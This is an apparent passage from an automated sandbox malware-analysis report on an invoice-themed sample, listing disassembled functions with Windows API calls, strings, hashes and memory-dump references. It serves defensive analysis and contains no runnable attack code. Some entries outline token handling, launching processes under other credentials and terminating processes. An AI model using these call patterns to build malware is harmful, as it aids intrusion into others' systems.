Instruction ID: a0396ab07ebaacba3068231b0b3205e318ed0e942386bfba970e812140da2b14
Opcode Fuzzy Hash: 28dbd566c5afe838d2931b901cdff4859f2ce895f7dea536146e35de4d1931de
Instruction Fuzzy Hash: C8D186716047019FC714DF1AC4A4A2ABBE5FF8A711F15885DF8899B362CB31EC49CB92

Function 0094175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00940FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00940FCA
Part of subcall function 00940FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00940FD6
Part of subcall function 00940FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00940FE5
Part of subcall function 00940FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00940FEC
Part of subcall function 00940FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00941002

GetLengthSid.ADVAPI32(?,00000000,00941335), ref: 009417AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 009417BA
HeapAlloc.KERNEL32(00000000), ref: 009417C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 009417DA
GetProcessHeap.KERNEL32(00000000,00000000,00941335), ref: 009417EE
HeapFree.KERNEL32(00000000), ref: 009417F5

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 70a27b87d4661ab1c606ffa9a818e8c49379457ae67e016f65ac30f3962a5405
Instruction ID: 9851e8442c766ecd1d31806979590e3ba9f7cd9119304149b5d9d581346aa610
Opcode Fuzzy Hash: 70a27b87d4661ab1c606ffa9a818e8c49379457ae67e016f65ac30f3962a5405
Instruction Fuzzy Hash: DC118B72628205FFDB109FA4CC89FAE7BBDEB86355F104528F485A7210D736A984DB60

Function 009414CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009414FF
OpenProcessToken.ADVAPI32(00000000), ref: 00941506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00941515
CloseHandle.KERNEL32(00000004), ref: 00941520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0094154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00941563

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 411b679cb41a5bfaa7d4c1c71cd2d4bcfe09f7133548f2a05940ae52efd161ca
Instruction ID: dd40a7792ad5668ac93cad282340f008948a32ce0f8f4a4ed221010d4a3ae9b4
Opcode Fuzzy Hash: 411b679cb41a5bfaa7d4c1c71cd2d4bcfe09f7133548f2a05940ae52efd161ca
Instruction Fuzzy Hash: 0411F9B2605209EBDF118F98DD49FDE7BADEF48744F044019FA09A2160C3758EA5EB60

Function 00903382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00903379,00902FE5), ref: 00903390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0090339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009033B7
SetLastError.KERNEL32(00000000,?,00903379,00902FE5), ref: 00903409

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: ba0cf1a58a9ef53a08475164bbf1a21df4894ddb0060ff7e3e7731670641e1ef
Instruction ID: 2ef48b7c9f5e9a6fb7882d42adfeae4fb4387374fa7a868910d479f12a87ad13
Opcode Fuzzy Hash: ba0cf1a58a9ef53a08475164bbf1a21df4894ddb0060ff7e3e7731670641e1ef
Instruction Fuzzy Hash: 6B01477322C721BEEA2527747CC67672A9CEF46379320822DF610881F0FF224D416284

Function 00912D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00915686,00923CD6,?,00000000,?,00915B6A,?,?,?,?,?,0090E6D1,?,009A8A48), ref: 00912D78
_free.LIBCMT ref: 00912DAB
_free.LIBCMT ref: 00912DD3
SetLastError.KERNEL32(00000000,?,?,?,?,0090E6D1,?,009A8A48,00000010,008E4F4A,?,?,00000000,00923CD6), ref: 00912DE0
SetLastError.KERNEL32(00000000,?,?,?,?,0090E6D1,?,009A8A48,00000010,008E4F4A,?,?,00000000,00923CD6), ref: 00912DEC
_abort.LIBCMT ref: 00912DF2

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: b3cd65ec096a7d8f4bbee51761c2f9c304eecb8433394a12e59444a3260238cc
Instruction ID: 1c13220729a4bf92c68932e670ed74ed8364616959261d98f1fdb889071e7856
Opcode Fuzzy Hash: b3cd65ec096a7d8f4bbee51761c2f9c304eecb8433394a12e59444a3260238cc
Instruction Fuzzy Hash: 01F0A97A7486082BC6123738FD06BDA165D6FC2771F25441CF838961D1EE2488E15160

Function 00978A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 008F9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008F9693
Part of subcall function 008F9639: SelectObject.GDI32(?,00000000), ref: 008F96A2
Part of subcall function 008F9639: BeginPath.GDI32(?), ref: 008F96B9
Part of subcall function 008F9639: SelectObject.GDI32(?,00000000), ref: 008F96E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00978A4E
LineTo.GDI32(?,00000003,00000000), ref: 00978A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00978A70
LineTo.GDI32(?,00000000,00000003), ref: 00978A80
EndPath.GDI32(?), ref: 00978A90
StrokePath.GDI32(?), ref: 00978AA0

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 4f27c0b918daa37feddc63466d5d63fa7976487f7dc190cec1b262771035ecc3
Instruction ID: 16843eb8d3643d2684bba8bf6634e6419f104b7f2462df5efad003d2a79f0b14
Opcode Fuzzy Hash: 4f27c0b918daa37feddc63466d5d63fa7976487f7dc190cec1b262771035ecc3
Instruction Fuzzy Hash: 43111B7604414CFFDF129F94DC88EAA7F6DEB08390F008026FA199A1A1C7719D95EFA0

Function 009451FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00945218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00945229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00945230
ReleaseDC.USER32(00000000,00000000), ref: 00945238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0094524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00945261

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 14aa3ca0866c3aac3da9d899e99296aa7eb4ca9f0a4bd5d814a2e8b3caef109d
Instruction ID: a8e79e19d48490d9fcae84ed130d81d70d2cd9e6ae566b22ea5eb197d702a634
Opcode Fuzzy Hash: 14aa3ca0866c3aac3da9d899e99296aa7eb4ca9f0a4bd5d814a2e8b3caef109d
Instruction Fuzzy Hash: 9E0144B6E04719BBEB105BE59C49E5EBFB8EF48751F044065FA08A7281D6709800DFA0

Function 008E1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 008E1BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 008E1BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 008E1C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 008E1C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 008E1C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 008E1C22

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: e8b940bcdc13fdf56a6b328017858da882fd85c1d9c17652851b7af522179563
Instruction ID: 14f2f921736c4a5dcc69291dddca9fc84313270fb0c443a6b8bf2e4cf81510d2
Opcode Fuzzy Hash: e8b940bcdc13fdf56a6b328017858da882fd85c1d9c17652851b7af522179563
Instruction Fuzzy Hash: 24016CB090275A7DE3008F5A8C85B52FFA8FF19754F00411F915C47941C7F5A864CBE5

Function 0094EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0094EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0094EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0094EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0094EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0094EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0094EB75

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 2ee770dd94fa08db9cf671ee5f8479c3bfe65c6c8ed3e10cacd3bf77a4d5b305
Instruction ID: 5dd85af2c9bc9b242ab2905d3ff9359b59bedfc291e850b54808c25207b2e9a8
Opcode Fuzzy Hash: 2ee770dd94fa08db9cf671ee5f8479c3bfe65c6c8ed3e10cacd3bf77a4d5b305
Instruction Fuzzy Hash: 67F03AB3254159BBE7215B629C4EEEF3A7CEFCAB11F00016CF605E1091D7A05A41EAB5

Function 00937439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00937452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00937469
GetWindowDC.USER32(?), ref: 00937475
GetPixel.GDI32(00000000,?,?), ref: 00937484
ReleaseDC.USER32(?,00000000), ref: 00937496
GetSysColor.USER32(00000005), ref: 009374B0

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: c34f495e5ba5ca863bafcae2915276984cb084b464639bb17b37d71cc6d6c381
Instruction ID: 9b423d4044abf64a70d33b3e0a1a1253786db9518bc33ee00e1a9303da0b3a3b
Opcode Fuzzy Hash: c34f495e5ba5ca863bafcae2915276984cb084b464639bb17b37d71cc6d6c381
Instruction Fuzzy Hash: 3F014F72418219FFDB515FA4DC48BA97BB6FB04311F510168F919A21B1CB312E91BF51

Function 00941874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0094187F
UnloadUserProfile.USERENV(?,?), ref: 0094188B
CloseHandle.KERNEL32(?), ref: 00941894
CloseHandle.KERNEL32(?), ref: 0094189C
GetProcessHeap.KERNEL32(00000000,?), ref: 009418A5
HeapFree.KERNEL32(00000000), ref: 009418AC

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: fe22a4cc0e2054f883077bfe5d3bf4672b462f242891b4b90d1b036c70b3721c
Instruction ID: d6169b2d596888b83cda1afb1395608277df9c0f27a95f3f8510b51d1f670831
Opcode Fuzzy Hash: fe22a4cc0e2054f883077bfe5d3bf4672b462f242891b4b90d1b036c70b3721c
Instruction Fuzzy Hash: 3DE0E5B701C101FBEB015FA1ED0C90ABF39FF89B22B508228F22991470CB3294A0EF50

Function 0094C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008E7620: _wcslen.LIBCMT ref: 008E7625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0094C6EE
_wcslen.LIBCMT ref: 0094C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0094C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0094C7CA

Strings

0, xrefs: 0094C6AF

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: e176c3a67fbffc3cf64f85596ea6acaa31801bade64c7b786c7e0935a530276b
Instruction ID: c8d52c84b7b306cce4ca676622aeeff638cf07c3e1193226cfe6c989629494ad
Opcode Fuzzy Hash: e176c3a67fbffc3cf64f85596ea6acaa31801bade64c7b786c7e0935a530276b
Instruction Fuzzy Hash: 3151EFB161A3419FD7949F28C885F6B77E8EF89324F040A2DF995E32A1DB74D804CB52

Function 0096AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0096AEA3

Part of subcall function 008E7620: _wcslen.LIBCMT ref: 008E7625

GetProcessId.KERNEL32(00000000), ref: 0096AF38
CloseHandle.KERNEL32(00000000), ref: 0096AF67

Strings

<, xrefs: 0096AE6B
@, xrefs: 0096AE72

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: df8183dd0ebac5e8ce60e5d7c9d0540a22de45462a7fb44cb796677d3ab8e287
Instruction ID: cfbad4b00f167b02108afbf53b99f1e83fd0ef9170ec274f571bc23261c93fbb
Opcode Fuzzy Hash: df8183dd0ebac5e8ce60e5d7c9d0540a22de45462a7fb44cb796677d3ab8e287
Instruction Fuzzy Hash: 74715671A00659DFCB14DF59C484A9EBBF4FF09310F048499E816AB2A2CB75ED41CF92

Function 0094719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00947206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0094723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0094724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009472CF

Strings

DllGetClassObject, xrefs: 00947242

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: f7e3344f650046beed7514d0f5b004a4e26c2f75b66901908d4bdfa278bb3542
Instruction ID: 19778c8dc50477840aac7e7da2094d7dec5597f3dd62d06e362b127996564bb2
Opcode Fuzzy Hash: f7e3344f650046beed7514d0f5b004a4e26c2f75b66901908d4bdfa278bb3542
Instruction Fuzzy Hash: 714171B1604208DFDB15CFA4C884E9ABBA9EF44314F1480ADBD199F20AD7B4D944CBA0

Function 00973D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00973E35
IsMenu.USER32(?), ref: 00973E4A
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00973E92
DrawMenuBar.USER32 ref: 00973EA5

Strings

0, xrefs: 00973D89

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: c4044b418f95750e22310691c16ba1cbb76717dab4616c2f924a753c9c2fba03
Instruction ID: 5911064d1dded37fa25b8846f694ac9c6b1a3f9b23827ddb4a16630d59770084
Opcode Fuzzy Hash: c4044b418f95750e22310691c16ba1cbb76717dab4616c2f924a753c9c2fba03
Instruction Fuzzy Hash: 19415976A15209EFDB10DF50D884EAABBB9FF49364F04C12AF909A7250D730AE44EF50

Function 00941DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD

Part of subcall function 00943CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00943CCA

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00941E66
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00941E79
SendMessageW.USER32(?,00000189,?,00000000), ref: 00941EA9

Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A

Strings

ListBox, xrefs: 00941E25
ComboBox, xrefs: 00941DF0

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 6de6a88dfd19a84f550c3d11cdeca91ece7d686f910b0b8e49cb68933f306f90
Instruction ID: c3859a0173b44547a87343a99f75bfd48df52c2b2b7574ed0c0c61910edab79a
Opcode Fuzzy Hash: 6de6a88dfd19a84f550c3d11cdeca91ece7d686f910b0b8e49cb68933f306f90
Instruction Fuzzy Hash: 78213775A00104BADB14AB75DC85CFFB7B8EF82350B104519F815E71E1EB74498A9620

Function 0096C9EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0096C9F1
_wcslen.LIBCMT ref: 0096CA68
_wcslen.LIBCMT ref: 0096CA9E
_wcslen.LIBCMT ref: 0096CAF9
_wcslen.LIBCMT ref: 0096CB2F
_wcslen.LIBCMT ref: 0096CB7F

Strings

HKLM, xrefs: 0096CA98, 0096CA9D
HKEY_LOCAL_MACHINE, xrefs: 0096CA62, 0096CA67

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
